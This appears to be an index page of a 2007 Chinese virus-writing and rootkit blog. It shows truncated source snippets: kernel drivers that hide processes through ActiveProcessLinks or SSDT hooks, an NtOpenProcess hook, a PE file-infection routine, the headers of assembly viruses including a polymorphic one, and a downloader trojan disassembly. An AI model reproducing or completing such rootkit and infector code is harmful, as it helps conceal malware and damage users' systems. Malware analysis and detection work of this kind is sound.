VX Z0ne
病毒地带
VIRII,ROOTKIT,KERNEL
-
2007-10-15
修改活动进程链隐藏进程 - [内核驱动]
coded by robinh00d
typedef struct _proc_info
{
DWORD dwPIDOffset;//PID偏移(相对于EPROCESS,下同)
DWORD dwAPLOffset;//ActiveProcessLink偏移
DWORD dwProcNameOffset ;//进程名偏移
char szProcName[16] ;//要隐藏的进程名
}proc_info ;
//取当前进程的EPROCESS
//遍历ACTIVEPROCESSLINK,遇到要隐藏的进程则用RemoveEn... -
没啥说的。。。挂钩NtOpenProcess
#include "ntddk.h"
#define FILE_DEVICE_PROTECTPROC 0x8000
#define PROTECTPROC_IOCTL_BASE 0x800
#define CTL_CODE_PROTECTPROC(i) CTL_CODE(FILE_DEVICE_PROTECTPROC, PROTECTPROC_IOCTL_BASE+i, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_PROTECTPROC_... -
2007-07-07
Virus.Win32.Mock - [病毒技术]
以前写的,比较适合科普
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
VirusSize equ (offset virus_end - offset virus_start)
-
在用ATool检测文件系统挂钩的时候,有时候会出现显示被挂钩(红色高亮),但是却检测不出模块名称来。开始觉得很奇怪,用WinDbg看了一下HOOK后的地址:
lkd> u 85b0a1e8
85b0a1e8 8b542408 mov edx,dword ptr [esp+8]
85b0a1ec 8d4c2404 lea ecx,[esp+4] -
2007-06-25
检查Windows所使用的内核及HAL的原始版本 - [内核驱动]
/*===================================================================
* Filename CheckKernel.c
*
* Author: kcrazy
* Email: thekcrazy@gmail.com
*
* Description: 检查Windows所使用的内核及HAL的原始版本
*
* Date: 2007-4-27 Original from kcrazy
*
* Version: 1.0
=================================... -
2007-06-25
修改PE的e_lfnew感染法 - [病毒技术]
实验性质的东西
仍然属于bind infection的一种,只不过他是把宿主文件的e_lfanew指向了后面病毒PE的PE HEADER,我测试了一下,如果PE HEADER的SizeOfHeaders大于4k的话程序就不能被load,也就是说宿主程序大小+病毒的所有头大小+病毒的节表大小不能大于4K,这样的话这种感染方式就没有实用价值了。
以上说法如有错误,请批评指正嘿嘿~
BOOL CInfection::InfectFile(LPCTSTR lpVirus, LPCTSTR lpHost)
{
CFileMap fm(lpHost) ;
DWORD dwHostSize = fm.GetSize() ;
if (0 == dwHos... -
2007-06-25
一个内核级的Shell工具源代码 - [内核驱动]
驱动部分
;@echo off
;goto make
;********************************************************************
;author :dge
;homepage:http://llfdge.googlepages.com/
;date :2007.3.16
;********************************************************************
.386
.model flat, stdcall
option casemap:none
include d:\masm32\include\w2k\ntstat... -
2007-06-25
Virus.Win32.Downloader.c分析 - [病毒技术]
【分析环境】VMWARE+WINDOWS XP SP2+OLLYDBG+PEID+PEInfo
首先用PEID扫描一下没有扫描出壳或者编译器特征,入口点RVA是0x70000,进一步使用PE分析工具查看关键的数据信息,我这里使用的是PEInfo:可以看到,代码入口不是在常规的.text节里而是在.rdata节里
再看输入表信息:输入表的RVA是0x70660,程序只导入了kernel32.dll里的GetProcAddress和LoadLibraryA这两个函数。
下面是详细的代码分析:
; 重定位到当前导入表
00470005 68 90184000 PUSH QQLiveUp.00401890
0047000A E8 71020000 CALL QQLiveUp.00470280 -
2007-06-21
Mein Herz Brennt巴黎现场 - [非主流音乐]
-
2007-06-21
OllyDbg's fault - [病毒技术]
以前分析一些病毒和壳的时候经常会遇到这个程序可以正常执行,却用OD加载不了。一直怀疑是手工修改了PE的某个字段,但不确定是修改了哪一个。昨天在DEBUGMAN上问了一下,果然牛人很多
原来是修改了NumOfRvaAndSizes字段,一般情况下都是0x10
... -
在开发ATool的时候发现了狙剑的SSDT和FSD HOOK检测功能有很多BUG,汗。。。
-
2007-06-21
HOOK SSDT实现进程隐藏 - [病毒技术]
/*
##################################################################
HideProc.C
Author :robinh00d[F-13 Lab]
Email :cr4zyexpl0rer_at_gmail.com
HomePage :http://cr4zyexpl0rer.googlepages.com
Last Updated :2006-03-23
个人练习之作,都是几年前的老技术了
&nb... -
快来测试一下你的人品吧!
-
2007-06-21
Win32.Poly.DarkRain[NOT COMPLATE] - [病毒技术]
未完成,敬请期待~
;-------------------------------------------------------------------------------------
; ______________________
; Win32.Poly.DarkRain
; Robinh00d/F-13 Labs
; ______________________
; __________
; 编译参数:
; __________
; ml /c /coff poly.asm
; link /subsystem:wi... -
VX Z0ne是研究VIRII,ROOTKIT和KERNEL的组织。
共1页 1
